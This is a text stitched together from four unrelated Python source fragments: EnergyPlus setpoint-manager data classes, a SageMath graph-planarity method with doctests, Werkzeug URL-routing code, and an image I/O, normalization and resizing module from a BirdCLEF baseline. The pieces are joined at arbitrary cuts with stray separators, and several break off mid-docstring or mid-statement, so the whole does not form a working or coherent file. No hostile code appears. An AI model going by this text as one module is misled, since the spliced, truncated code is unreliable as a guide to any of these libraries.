str: the value of `setpoint_node_or_nodelist_name` or None if not set
"""
return self["Setpoint Node or NodeList Name"]
@setpoint_node_or_nodelist_name.setter
def setpoint_node_or_nodelist_name(self, value=None):
"""Corresponds to IDD field `Setpoint Node or NodeList Name`"""
self["Setpoint Node or NodeList Name"] = value
class SetpointManagerSingleZoneHeating(DataObject):

    """Corresponds to IDD object `SetpointManager:SingleZone:Heating`.

    Monitors the control zone's heating load, the zone inlet node flow
    rate, and the zone node temperature, and computes a supply air
    setpoint temperature that satisfies the heating load of the control
    zone.
    """

    # IDD schema: per-field metadata plus object-level properties.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'control variable',
             {'name': u'Control Variable',
              'pyname': u'control_variable',
              'default': u'Temperature',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'Temperature'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'minimum supply air temperature',
             {'name': u'Minimum Supply Air Temperature',
              'pyname': u'minimum_supply_air_temperature',
              'default': -99.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'C'}),
            (u'maximum supply air temperature',
             {'name': u'Maximum Supply Air Temperature',
              'pyname': u'maximum_supply_air_temperature',
              'default': 99.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'C'}),
            (u'control zone name',
             {'name': u'Control Zone Name',
              'pyname': u'control_zone_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'zone node name',
             {'name': u'Zone Node Name',
              'pyname': u'zone_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'zone inlet node name',
             {'name': u'Zone Inlet Node Name',
              'pyname': u'zone_inlet_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'setpoint node or nodelist name',
             {'name': u'Setpoint Node or NodeList Name',
              'pyname': u'setpoint_node_or_nodelist_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
        ]),
        'format': None,
        'group': u'Setpoint Managers',
        'min-fields': 8,
        'name': u'SetpointManager:SingleZone:Heating',
        'pyname': u'SetpointManagerSingleZoneHeating',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """str: Value of IDD field `Name`, or None when the field is unset.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Assign IDD field `Name`."""
        self["Name"] = value

    @property
    def control_variable(self):
        """str: Value of IDD field `Control Variable`, or None when the
        field is unset.

        Defaults to ``Temperature``.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Control Variable"]

    @control_variable.setter
    def control_variable(self, value="Temperature"):
        """Assign IDD field `Control Variable`."""
        self["Control Variable"] = value

    @property
    def minimum_supply_air_temperature(self):
        """float: Value of IDD field `Minimum Supply Air Temperature`
        (units C), or None when the field is unset.

        Defaults to ``-99.0``.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Minimum Supply Air Temperature"]

    @minimum_supply_air_temperature.setter
    def minimum_supply_air_temperature(self, value=-99.0):
        """Assign IDD field `Minimum Supply Air Temperature` (units C)."""
        self["Minimum Supply Air Temperature"] = value

    @property
    def maximum_supply_air_temperature(self):
        """float: Value of IDD field `Maximum Supply Air Temperature`
        (units C), or None when the field is unset.

        Defaults to ``99.0``.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Maximum Supply Air Temperature"]

    @maximum_supply_air_temperature.setter
    def maximum_supply_air_temperature(self, value=99.0):
        """Assign IDD field `Maximum Supply Air Temperature` (units C)."""
        self["Maximum Supply Air Temperature"] = value

    @property
    def control_zone_name(self):
        """str: Value of IDD field `Control Zone Name`, or None when the
        field is unset.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Control Zone Name"]

    @control_zone_name.setter
    def control_zone_name(self, value=None):
        """Assign IDD field `Control Zone Name`."""
        self["Control Zone Name"] = value

    @property
    def zone_node_name(self):
        """str: Value of IDD field `Zone Node Name`, or None when the
        field is unset.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Zone Node Name"]

    @zone_node_name.setter
    def zone_node_name(self, value=None):
        """Assign IDD field `Zone Node Name`."""
        self["Zone Node Name"] = value

    @property
    def zone_inlet_node_name(self):
        """str: Value of IDD field `Zone Inlet Node Name`, or None when
        the field is unset.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Zone Inlet Node Name"]

    @zone_inlet_node_name.setter
    def zone_inlet_node_name(self, value=None):
        """Assign IDD field `Zone Inlet Node Name`."""
        self["Zone Inlet Node Name"] = value

    @property
    def setpoint_node_or_nodelist_name(self):
        """str: Value of IDD field `Setpoint Node or NodeList Name` --
        the node(s) at which the temperature will be set -- or None when
        the field is unset.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Setpoint Node or NodeList Name"]

    @setpoint_node_or_nodelist_name.setter
    def setpoint_node_or_nodelist_name(self, value=None):
        """Assign IDD field `Setpoint Node or NodeList Name`."""
        self["Setpoint Node or NodeList Name"] = value
class SetpointManagerSingleZoneCooling(DataObject):
""" Corresponds to IDD object `SetpointManager:SingleZone:Cooling`
This setpoint manager detects the control zone load to meet the current cooling
setpoint, zone inlet node flow rate, and zone node temperature, and calculates a
setpoint temperature for the supply air that will satisfy the zone cooling load for
the control zone.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'default': u'Temperature',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum supply air temperature',
{'name': u'Minimum Supply Air Temperature',
'pyname': u'minimum_supply_air_temperature',
'default': -99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'maximum supply air temperature',
{'name': u'Maximum Supply Air Temperature',
'pyname': u'maximum_supply_air_temperature',
'default': 99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'control zone name',
{'name': u'Control Zone Name',
'pyname': u'control_zone_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone node name',
{'name': u'Zone Node Name',
'pyname': u'zone_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone inlet node name',
{'name': u'Zone Inlet Node Name',
'pyname': u'zone_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 8,
'name': u'SetpointManager:SingleZone:Cooling',
'pyname': u'SetpointManagerSingleZoneCooling',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
| Default value: Temperature
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value="Temperature"):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def minimum_supply_air_temperature(self):
"""field `Minimum Supply Air Temperature`
| Units: C
| Default value: -99.0
Args:
value (float): value for IDD Field `Minimum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_supply_air_temperature` or None if not set
"""
return self["Minimum Supply Air Temperature"]
@minimum_supply_air_temperature.setter
def minimum_supply_air_temperature(self, value=-99.0):
"""Corresponds to IDD field `Minimum Supply Air Temperature`"""
self["Minimum Supply Air Temperature"] = value
@property
def maximum_supply_air_temperature(self):
"""field `Maximum Supply Air Temperature`
| Units: C
| Default value: 99.0
Args:
value (float): value for IDD Field `Maximum Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value | |
as the second tuple entry. If the graph is planar, returns
``None`` as the second entry. When set to ``False``, only a boolean
answer is returned.
- ``set_embedding`` -- boolean (default: ``False``); whether to set the
instance field variable that contains a combinatorial embedding
(clockwise ordering of neighbors at each vertex). This value will only
be set if a planar embedding is found. It is stored as a Python dict:
``v1: [n1,n2,n3]`` where ``v1`` is a vertex and ``n1,n2,n3`` are its
neighbors.
- ``set_pos`` -- boolean (default: ``False``); whether to set the
position dictionary (for plotting) to reflect the combinatorial
      embedding. Note that this value will default to ``False`` if
      ``set_embedding`` is set to ``False``. Also, the position dictionary
      will only be updated if a planar embedding is found.
EXAMPLES::
sage: g = graphs.CubeGraph(4)
sage: g.is_planar()
False
::
sage: g = graphs.CircularLadderGraph(4)
sage: g.is_planar(set_embedding=True)
True
sage: g.get_embedding()
{0: [1, 4, 3],
1: [2, 5, 0],
2: [3, 6, 1],
3: [0, 7, 2],
4: [0, 5, 7],
5: [1, 6, 4],
6: [2, 7, 5],
7: [4, 6, 3]}
::
sage: g = graphs.PetersenGraph()
sage: (g.is_planar(kuratowski=True))[1].adjacency_matrix()
[0 1 0 0 0 1 0 0 0]
[1 0 1 0 0 0 1 0 0]
[0 1 0 1 0 0 0 1 0]
[0 0 1 0 0 0 0 0 1]
[0 0 0 0 0 0 1 1 0]
[1 0 0 0 0 0 0 1 1]
[0 1 0 0 1 0 0 0 1]
[0 0 1 0 1 1 0 0 0]
[0 0 0 1 0 1 1 0 0]
::
sage: k43 = graphs.CompleteBipartiteGraph(4, 3)
sage: result = k43.is_planar(kuratowski=True); result
(False, Graph on 6 vertices)
sage: result[1].is_isomorphic(graphs.CompleteBipartiteGraph(3, 3))
True
Multi-edged and looped graphs are partially supported::
sage: G = Graph({0: [1, 1]}, multiedges=True)
sage: G.is_planar()
True
sage: G.is_planar(on_embedding={})
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(set_pos=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(set_embedding=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute with embeddings of multiple-edged or looped graphs
sage: G.is_planar(kuratowski=True)
(True, None)
::
sage: G = graphs.CompleteGraph(5)
sage: G = Graph(G, multiedges=True)
sage: G.add_edge(0, 1)
sage: G.is_planar()
False
sage: b,k = G.is_planar(kuratowski=True)
sage: b
False
sage: k.vertices()
[0, 1, 2, 3, 4]
TESTS:
:trac:`18045`::
sage: g = graphs.CompleteGraph(4)
sage: g.is_planar(set_embedding=True)
True
sage: emb = {0 : [2,3,1], 1: [2,3,0], 2: [1,3,0], 3:[0,1,2]}
sage: g.is_planar(on_embedding=emb)
False
:trac:`19193`::
sage: posets.BooleanLattice(3).cover_relations_graph().is_planar()
True
Corner cases::
sage: graphs.EmptyGraph().is_planar()
True
sage: Graph(1).is_planar()
True
"""
# Quick check first
if (on_embedding is None and not kuratowski and not set_embedding and not set_pos
and not self.allows_loops() and not self.allows_multiple_edges()):
if self.order() > 4 and self.size() > 3 * self.order() - 6:
return False
if self.has_multiple_edges() or self.has_loops():
if set_embedding or (on_embedding is not None) or set_pos:
raise NotImplementedError("cannot compute with embeddings of multiple-edged or looped graphs")
else:
return self.to_simple().is_planar(kuratowski=kuratowski)
if on_embedding is not None:
self._check_embedding_validity(on_embedding,boolean=False)
return (0 == self.genus(minimal=False, set_embedding=False, on_embedding=on_embedding))
else:
from sage.graphs.planarity import is_planar
G = self.to_undirected()
if hasattr(G, '_immutable'):
G = copy(G)
planar = is_planar(G,kuratowski=kuratowski, set_pos=set_pos, set_embedding=set_embedding)
if kuratowski:
bool_result = planar[0]
else:
bool_result = planar
if bool_result:
if set_pos:
self._pos = G._pos
if set_embedding:
self._embedding = G._embedding
return planar
def is_circular_planar(self, on_embedding=None, kuratowski=False,
set_embedding=True, boundary=None,
ordered=False, set_pos=False):
r"""
Check whether the graph is circular planar (outerplanar)
A graph is circular planar if it has a planar embedding in which all
vertices can be drawn in order on a circle. This method can also be used
to check the existence of a planar embedding in which the vertices of a
specific set (the *boundary*) can be drawn on a circle, all other
vertices being drawn inside of the circle. An order can be defined on
the vertices of the boundary in order to define how they are to appear
on the circle.
INPUT:
- ``on_embedding`` -- dictionary (default: ``None``); the embedding
dictionary to test planarity on (i.e.: will return ``True`` or
``False`` only for the given embedding)
- ``kuratowski`` -- boolean (default: ``False``); whether to return a
tuple with boolean first entry and the Kuratowski subgraph (i.e. an
edge subdivision of `K_5` or `K_{3,3}`) as the second entry (see
OUTPUT below)
- ``set_embedding`` -- boolean (default: ``True``); whether or not to
set the instance field variable that contains a combinatorial
embedding (clockwise ordering of neighbors at each vertex). This value
will only be set if a circular planar embedding is found. It is stored
as a Python dict: ``v1: [n1,n2,n3]`` where ``v1`` is a vertex and
``n1,n2,n3`` are its neighbors.
- ``boundary`` -- list (default: ``None``); an ordered list of vertices
that are required to be drawn on the circle, all others being drawn
inside of it. It is set to ``None`` by default, meaning that *all*
vertices should be drawn on the boundary.
- ``ordered`` -- boolean (default: ``False``); whether or not to
consider the order of the boundary. It required ``boundary`` to be
defined.
- ``set_pos`` -- boolean (default: ``False``); whether or not to set the
position dictionary (for plotting) to reflect the combinatorial
embedding. Note that this value will default to ``False`` if
``set_embedding`` is set to ``False``. Also, the position dictionary
will only be updated if a circular planar embedding is found.
OUTPUT:
The method returns ``True`` if the graph is circular planar, and
``False`` if it is not.
If ``kuratowski`` is set to ``True``, then this function will return a
tuple, whose first entry is a boolean and whose second entry is the
Kuratowski subgraph (i.e. an edge subdivision of `K_5` or `K_{3,3}`)
isolated by the Boyer-Myrvold algorithm. Note that this graph might
contain a vertex or edges that were not in the initial graph. These
would be elements referred to below as parts of the wheel and the star,
which were added to the graph to require that the boundary can be drawn
on the boundary of a disc, with all other vertices drawn inside (and no
edge crossings).
ALGORITHM:
This is a linear time algorithm to test for circular planarity. It
relies on the edge-addition planarity algorithm due to Boyer-Myrvold. We
accomplish linear time for circular planarity by modifying the graph
before running the general planarity algorithm.
REFERENCE:
[BM2004]_
EXAMPLES::
sage: g439 = Graph({1: [5, 7], 2: [5, 6], 3: [6, 7], 4: [5, 6, 7]})
sage: g439.show()
sage: g439.is_circular_planar(boundary=[1, 2, 3, 4])
False
sage: g439.is_circular_planar(kuratowski=True, boundary=[1, 2, 3, 4])
(False, Graph on 8 vertices)
sage: g439.is_circular_planar(kuratowski=True, boundary=[1, 2, 3])
(True, None)
sage: g439.get_embedding()
{1: [7, 5],
2: [5, 6],
3: [6, 7],
4: [7, 6, 5],
5: [1, 4, 2],
6: [2, 4, 3],
7: [3, 4, 1]}
Order matters::
sage: K23 = graphs.CompleteBipartiteGraph(2, 3)
sage: K23.is_circular_planar(boundary=[0, 1, 2, 3])
True
sage: K23.is_circular_planar(ordered=True, boundary=[0, 1, 2, 3])
False
With a different order::
sage: K23.is_circular_planar(set_embedding=True, boundary=[0, 2, 1, 3])
True
TESTS:
Corner cases::
sage: graphs.EmptyGraph().is_circular_planar()
True
sage: Graph(1).is_circular_planar()
True
"""
if ordered and boundary is None:
raise ValueError("boundary must be set when ordered is True")
# Quick check first
if (on_embedding is None and not kuratowski and set_embedding and
boundary is None and not ordered and not set_pos and
not self.allows_loops() and not self.allows_multiple_edges()):
if self.order() > 3 and self.size() > 2 * self.order() - 3:
return False
if boundary is None:
boundary = self
# A local copy of self
from sage.graphs.graph import Graph
from sage.graphs.planarity import is_planar
graph = Graph(self)
if hasattr(graph, '_embedding'):
del(graph._embedding)
# Adds a new vertex to the graph and connects it to all vertices of the
# boundary
extra = graph.add_vertex()
graph.add_edges((vertex, extra) for vertex in boundary)
extra_edges = []
# When ordered is True, we need a way to make sure | |
raise BadHost()
return MapAdapter(
self,
server_name,
script_name,
subdomain,
url_scheme,
path_info,
default_method,
query_args,
)
def bind_to_environ(self, environ, server_name=None, subdomain=None):
    """Like :meth:`bind`, but the binding information is taken from a
    WSGI ``environ`` dict (or any object with an ``environ`` attribute,
    such as a request object).

    The protocol cannot convey the configured subdomain or the "real"
    server name, so pass ``server_name`` yourself if you rely on
    subdomain matching: with ``server_name='example.com'`` and a WSGI
    ``SERVER_NAME`` of ``'staging.dev.example.com'`` the computed
    subdomain is ``'staging.dev'``. Without a hint, ``SERVER_NAME`` /
    ``SERVER_PORT`` (or ``HTTP_HOST``) is used with subdomain support
    disabled.

    ``PATH_INFO`` is also stored on the returned :class:`MapAdapter`,
    so its ``match`` method can be called without arguments.

    .. versionchanged:: 1.0.0
        A server name specifying port 443 matches an incoming ``https``
        request without a port, and a mismatch between the passed and
        the incoming WSGI server name emits a warning.

    .. versionchanged:: 0.8
        An unexpected server name no longer raises a ValueError.

    .. versionchanged:: 0.5
        The bogus, ineffective `calculate_subdomain` parameter was
        removed.

    :param environ: a WSGI environment.
    :param server_name: an optional server name hint (see above).
    :param subdomain: optionally the current subdomain (see above).
    """
    environ = _get_environ(environ)
    wsgi_server_name = get_host(environ).lower()
    scheme = environ["wsgi.url_scheme"]

    if server_name is None:
        server_name = wsgi_server_name
    else:
        server_name = server_name.lower()

        # get_host() never reports the scheme's default port, so strip it
        # from the hint as well before the two names are compared.
        if scheme == "http" and server_name.endswith(":80"):
            server_name = server_name[: -len(":80")]
        elif scheme == "https" and server_name.endswith(":443"):
            server_name = server_name[: -len(":443")]

    if subdomain is None and not self.host_matching:
        cur_server_name = wsgi_server_name.split(".")
        real_server_name = server_name.split(".")
        offset = -len(real_server_name)

        if cur_server_name[offset:] == real_server_name:
            subdomain = ".".join(filter(None, cur_server_name[:offset]))
        else:
            # This can happen even with valid configs, e.g. when the
            # server is accessed directly by IP address. Instead of
            # raising (pre-0.8 behavior) we bind to an invalid subdomain
            # so matching yields a 404.
            warnings.warn(
                f"Current server name {wsgi_server_name!r} doesn't match configured"
                f" server name {server_name!r}",
                stacklevel=2,
            )
            subdomain = "<invalid>"

    def _get_wsgi_string(name):
        val = environ.get(name)
        return _wsgi_decoding_dance(val, self.charset) if val is not None else None

    script_name = _get_wsgi_string("SCRIPT_NAME")
    path_info = _get_wsgi_string("PATH_INFO")
    query_args = _get_wsgi_string("QUERY_STRING")
    return Map.bind(
        self,
        server_name,
        script_name,
        subdomain,
        scheme,
        environ["REQUEST_METHOD"],
        path_info,
        query_args=query_args,
    )
def update(self):
    """Re-sort the compiled rules after changes so that matching and
    building happen in the correct order."""
    if not self._remap:
        return

    with self._remap_lock:
        # Double-checked locking: another thread may already have
        # remapped while we waited for the lock.
        if not self._remap:
            return

        self._rules.sort(key=lambda rule: rule.match_compare_key())
        for endpoint_rules in self._rules_by_endpoint.values():
            endpoint_rules.sort(key=lambda rule: rule.build_compare_key())

        self._remap = False
def __repr__(self):
    """Debug representation listing every registered rule."""
    all_rules = list(self.iter_rules())
    return f"{type(self).__name__}({pformat(all_rules)})"
class MapAdapter:
"""Returned by :meth:`Map.bind` or :meth:`Map.bind_to_environ` and does
the URL matching and building based on runtime information.
"""
def __init__(
    self,
    map,
    server_name,
    script_name,
    subdomain,
    url_scheme,
    path_info,
    default_method,
    query_args=None,
):
    """Store the normalized binding information for later matching."""
    self.map = map
    self.server_name = _to_str(server_name)

    # Rule matching assumes the script name always ends with a slash.
    script_name = _to_str(script_name)
    if not script_name.endswith("/"):
        script_name = f"{script_name}/"
    self.script_name = script_name

    self.subdomain = _to_str(subdomain)
    self.url_scheme = _to_str(url_scheme)
    self.path_info = _to_str(path_info)
    self.default_method = _to_str(default_method)
    self.query_args = query_args

    # WebSocket binds are identified purely by their URL scheme.
    self.websocket = self.url_scheme in ("ws", "wss")
def dispatch(
    self, view_func, path_info=None, method=None, catch_http_exceptions=False
):
    """Match the bound request and hand the result to ``view_func``.

    ``view_func`` is called with the matched endpoint and the dict of
    converted values; it should look up and invoke the actual view and
    return a response object or WSGI application. A ``RequestRedirect``
    raised by matching is *returned* (it is itself a response-like
    object). Other HTTP exceptions propagate unless
    ``catch_http_exceptions`` is true, in which case they are returned
    as well — so the result may be an exception object; use
    ``Response.force_type`` to coerce it when needed.

    :param view_func: callable taking ``(endpoint, values)`` and
        dispatching to the real view.
    :param path_info: path to match; overrides the bound path info.
    :param method: HTTP method to match; overrides the bound method.
    :param catch_http_exceptions: return werkzeug
        :class:`HTTPException`\\s instead of raising them.
    """
    try:
        try:
            endpoint, args = self.match(path_info, method)
        except RequestRedirect as redirect:
            return redirect
        return view_func(endpoint, args)
    except HTTPException as http_exc:
        if catch_http_exceptions:
            return http_exc
        raise
def match(
self,
path_info=None,
method=None,
return_rule=False,
query_args=None,
websocket=None,
):
"""The usage is simple: you just pass the match method the current
path info as well as the method (which defaults to `GET`). The
following things can then happen:
- you receive a `NotFound` exception that indicates that no URL is
matching. A `NotFound` exception is also a WSGI application you
can call to get a default page not found page (happens to be the
same object as `werkzeug.exceptions.NotFound`)
- you receive a `MethodNotAllowed` exception that indicates that there
is a match for this URL but not for the current request method.
This is useful for RESTful applications.
- you receive a `RequestRedirect` exception with a `new_url`
attribute. This exception is used to notify you about a request
Werkzeug requests from your WSGI application. This is for example the
case if you request ``/foo`` although the correct URL is ``/foo/``
You can use the `RequestRedirect` instance as response-like object
similar to all other subclasses of `HTTPException`.
- you receive a ``WebsocketMismatch`` exception if the only
match is a WebSocket rule but the bind is an HTTP request, or
if the match is an HTTP rule but the bind is a WebSocket
request.
- you get a tuple in the form ``(endpoint, arguments)`` if there is
a match (unless `return_rule` is True, in which case you get a tuple
in the form ``(rule, arguments)``)
If the path info is not passed to the match method the default path
info of the map is used (defaults to the root URL if not defined
explicitly).
All of the exceptions raised are subclasses of `HTTPException` so they
can be used as WSGI responses. They will all render generic error or
redirect pages.
Here is a small example for matching:
>>> m = Map([
... Rule('/', endpoint='index'),
... Rule('/downloads/', endpoint='downloads/index'),
... Rule('/downloads/<int:id>', endpoint='downloads/show')
... ])
>>> urls = m.bind("example.com", "/")
>>> urls.match("/", "GET")
('index', {})
>>> urls.match("/downloads/42")
('downloads/show', {'id': 42})
And here is what happens on redirect and missing URLs:
>>> urls.match("/downloads")
Traceback (most recent call last):
...
RequestRedirect: http://example.com/downloads/
>>> urls.match("/missing")
Traceback (most recent call last):
...
NotFound: 404 Not Found
:param path_info: the path info to use for matching. Overrides the
path info specified on binding.
:param method: the HTTP method used for matching. Overrides the
method specified on binding.
:param return_rule: return the rule that matched instead of just the
endpoint (defaults to `False`).
:param query_args: optional query arguments that are used for
automatic redirects as string or dictionary. It's
currently not possible to use the query arguments
for URL matching.
:param websocket: Match WebSocket instead of HTTP requests. A
websocket request has a ``ws`` or ``wss``
:attr:`url_scheme`. This overrides that detection.
.. versionadded:: 1.0
Added ``websocket``.
.. | |
<reponame>cresposito/BirdCLEF-Baseline
# This file includes basic functionality for image processing
# including i/o handling, image augmentation and model input pre-processing
# Author: <NAME>, 2018, Chemnitz University of Technology
import sys
sys.path.append("..")
import copy
import numpy as np
import cv2
######################## CONFIG ##########################
import config as cfg
#Fixed random seed
RANDOM = cfg.getRandomState()
def resetRandomState():
    # Re-seed the module-level RNG from the config so augmentation
    # sequences are reproducible across runs.
    global RANDOM
    RANDOM = cfg.getRandomState()
########################## I/O ###########################
def openImage(path, im_dim=1):
    """Load an image as float32 with values in [0, 1].

    im_dim == 3 loads color (OpenCV's BGR channel order); any other
    value loads grayscale.

    Raises IOError when the file cannot be read: cv2.imread signals
    failure by returning None, which previously fell through into the
    arithmetic below and produced a confusing TypeError.
    """
    flags = 1 if im_dim == 3 else 0
    img = cv2.imread(path, flags)
    if img is None:
        raise IOError('cannot read image: {}'.format(path))
    # Convert to floats between 0 and 1
    img = np.asarray(img / 255., dtype='float32')
    return img
def showImage(img, name='IMAGE', timeout=-1):
    # Display img in a window titled `name`; blocks for `timeout` ms
    # (a non-positive value waits until a key is pressed).
    cv2.imshow(name, img)
    cv2.waitKey(timeout)
def saveImage(img, path):
    # Write img to `path`; the encoder is chosen from the file extension.
    cv2.imwrite(path, img)
#################### PRE-PROCESSING ######################
def normalize(img, zero_center=False):
    """Scale pixel values to the full [0, 1] range, in place where possible.

    With zero_center=True the result is shifted to [-1, 1].

    Fixes two defects of the previous version, whose condition
    `min != 0 and max != 0` (a) skipped normalization entirely and merely
    clipped images that already had min == 0 (e.g. a [0, 255] image was
    clamped to 1), and (b) divided by zero for constant nonzero images,
    producing NaNs.
    """
    lo = img.min()
    hi = img.max()
    if hi > lo:
        img -= lo
        img /= (hi - lo)
    else:
        # Constant image: nothing to scale; just force values into range.
        img = img.clip(0, 1)
    # Use values between -1 and 1
    if zero_center:
        img -= 0.5
        img *= 2
    return img
def substractMean(img, clip=True):
    """Subtract the mean in place: fixed per-channel dataset means for
    3-channel (BGR) images, the image's own mean otherwise.

    With clip=True (default) negative results are clamped to zero.
    """
    if len(img.shape) == 3:
        # Pick the mean scale matching the input's value range
        # (normalized [0, 1] floats vs. raw 8-bit values).
        if img.max() <= 1.0:
            channel_means = (0.4850, 0.4579, 0.4076)  # B, G, R
        else:
            channel_means = (123.680, 116.779, 103.939)  # B, G, R
        for channel, channel_mean in enumerate(channel_means):
            img[:, :, channel] -= channel_mean
    else:
        img -= np.mean(img)
    if clip:
        img = img.clip(0, img.max())
    return img
def prepare(img):
    """Reshape an image into the 4D (batch, channels, height, width)
    layout Theano ConvNets expect."""
    # Grayscale images get a singleton channel axis appended first.
    if len(img.shape) == 2:
        img = img[:, :, np.newaxis]
    # channels-last -> channels-first
    img = np.transpose(img, (2, 0, 1))
    # Prepend the batch axis.
    return img[np.newaxis, ...]
######################## RESIZING ########################
def resize(img, width, height, mode='squeeze'):
    """Resize img to (height, width) using the requested strategy.

    Modes: 'crop'/'cropCenter', 'cropRandom', 'fill'; any other value
    squeeze-resizes (ignoring aspect ratio). Returns the input unchanged
    when it already has the target shape.
    """
    if img.shape[:2] == (height, width):
        return img
    if mode in ('crop', 'cropCenter'):
        return cropCenter(img, width, height)
    if mode == 'cropRandom':
        return cropRandom(img, width, height)
    if mode == 'fill':
        return fill(img, width, height)
    return squeeze(img, width, height)
def squeeze(img, width, height):
    # Squeeze resize: Resize image and ignore aspect ratio
    # (cubic interpolation; note cv2 takes (width, height) order).
    return cv2.resize(img, (width, height), interpolation=cv2.INTER_CUBIC)
def cropRandom(img, width, height):
    """Random crop: upscale so both sides cover the target (with ~10%
    head room), then cut a (height, width) window at a random offset."""
    # Original image shape
    h, w = img.shape[:2]
    aspect_ratio = float(max(h, w)) / float(min(h, w))

    # Scale the shorter side up to `minsize`, keeping the aspect ratio.
    minsize = int(max(width, height) * 1.1)
    if w <= h and w < minsize:
        img = squeeze(img, minsize, int(minsize * aspect_ratio))
    elif h < w and h < minsize:
        img = squeeze(img, int(minsize * aspect_ratio), minsize)

    # Crop with a random offset. Guard against a zero margin: for small
    # targets int(size * 1.1) can equal size, and RANDOM.randint(0, 0)
    # raises ValueError (low == high).
    h, w = img.shape[:2]
    top = RANDOM.randint(0, h - height) if h > height else 0
    left = RANDOM.randint(0, w - width) if w > width else 0
    new_img = img[top:top + height, left:left + width]
    return new_img
def cropCenter(img, width, height):
    # Center crop: Scale shortest side, crop longer side
    # Returns a (height, width) window taken from the middle of the
    # rescaled image.
    # Original image shape
    h, w = img.shape[:2]
    # aspect_ratio is always >= 1 (long side over short side)
    aspect_ratio = float(max(h, w)) / float(min(h, w))
    # Scale original image
    if w == h:
        # Square input: scale to the larger target side so both crops fit
        img = squeeze(img, max(width, height), max(width, height))
    elif width >= height:
        if h >= w:
            # Portrait image, landscape target: match target width,
            # scaled height = width * h / w
            img = squeeze(img, width, int(width * aspect_ratio))
        else:
            # Landscape image: match target height, scaled width = height * w / h
            # NOTE(review): the scaled width is not guaranteed to reach
            # `width` for near-square inputs -- confirm callers only use
            # sufficiently elongated images here.
            img = squeeze(img, int(height * aspect_ratio), height)
    else:
        if h >= w:
            # Portrait image, portrait target: match target height;
            # height / aspect_ratio == height * w / h
            img = squeeze(img, int(height / aspect_ratio), height)
        else:
            # Landscape image, portrait target: match target height,
            # scaled width = height * w / h
            img = squeeze(img, int(height * aspect_ratio), height)
    #Crop from original image
    top = (img.shape[0] - height) // 2
    left = (img.shape[1] - width) // 2
    new_img = img[top:top + height, left:left + width]
    return new_img
def fill(img, width, height):
    # Fill mode: Scale longest side, pad shorter side with noise
    # Determine new shape
    try:
        new_shape = (height, width, img.shape[2])
    except:
        # Grayscale input has no channel axis
        new_shape = (height, width)
    # Allocate array with noise (standard-normal values act as the padding)
    new_img = RANDOM.normal(0.0, 1.0, new_shape)
    # Original image shape
    h, w = img.shape[:2]
    # aspect_ratio is always >= 1 (long side over short side)
    aspect_ratio = float(max(h, w)) / float(min(h, w))
    # Scale original image so it fits inside the target canvas
    if w == h:
        # Square input: scale to the smaller target side
        img = squeeze(img, min(width, height), min(width, height))
    elif width >= height:
        if h >= w:
            # Portrait image, landscape target: match target height,
            # scaled width = height * w / h
            img = squeeze(img, int(height / aspect_ratio), height)
        else:
            # Landscape image: match target width, scaled height shrinks
            img = squeeze(img, width, int(width / aspect_ratio))
    else:
        if h >= w:
